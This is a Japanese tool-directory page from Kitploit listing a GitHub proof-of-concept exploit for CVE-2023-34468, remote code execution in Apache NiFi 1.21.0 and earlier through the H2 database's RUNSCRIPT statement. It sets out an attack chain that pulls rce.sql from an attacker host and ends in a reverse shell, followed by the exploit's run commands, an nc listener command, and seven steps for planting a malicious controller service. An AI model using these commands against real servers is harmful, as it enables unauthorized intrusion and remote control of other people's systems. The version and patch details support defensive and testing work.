Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

CVE-2023-34468 の PoC エクスプロイト — Apache NiFi <= 1.21.0 における H2 RUNSCRIPT を介した RCE

リポジトリを見る
424ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Apache NiFi <= 1.21.0 における H2 データベース RUNSCRIPT を介したリモートコード実行


脆弱性

Apache NiFi にはデフォルトで H2 データベース JAR が同梱されています。DBCPConnectionPool コントローラサービスを構成してこの H2 ドライバを使用できます。H2 は RUNSCRIPT ステートメントをサポートしており、リモート URL から SQL ファイルを取得して実行します。その SQL ファイルは CREATE ALIAS を介して任意の Java コードを定義し、サーバ OS 上で実行できます。

攻撃チェーン:

root@kitploit:~
DBCPConnectionPool (H2 ドライバ)
    → ExecuteSQL プロセッサ
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java メソッド)
                → CALL SHELLEXEC (リバースシェル)

影響を受けるバージョン

ソフトウェアバージョン
Apache NiFi<= 1.21.0
修正バージョン1.21.1+
Java任意(同梱)

必要条件

  • Python 3.x
  • requests ライブラリ → pip install requests
  • 匿名書き込みアクセスまたは有効な認証情報を持つ NiFi ターゲット
  • リバースシェルコールバックのため、ターゲットからあなたのマシンへのネットワークアクセス

使用方法

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

引数


セットアップ

ターミナル 1 — リスナー:

root@kitploit:~
nc -lvnp 4444

ターミナル 2 — エクスプロイト:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

PoC の動作

root@kitploit:~
Step 1  匿名アクセスと書き込み権限を確認
Step 2  ルートプロセスグループ ID を取得
Step 3  悪意のある DBCPConnectionPool コントローラサービスを作成
Step 4  コントローラサービスを有効化(リビジョンバージョン管理を処理)
Step 5  私たちの HTTP サーバ上の rce.sql を指す ExecuteSQL プロセッサを作成
Step 6  プロセッサを起動 → NiFi が rce.sql を取得 → シェルコールバック
Step 7  クリーンアップ(--cleanup フラグが設定されている場合)
ツールをダウンロード
引数デフォルト説明
--targethttp://NiFi.target.comターゲット NiFi のベース URL
--lhost10.10.10.10あなたの IP (tun0)
--lport4444リバースシェルリスナーポート
--http-port80rce.sql を提供するポート
--cleanupFalse実行後に作成されたアーティファクトを削除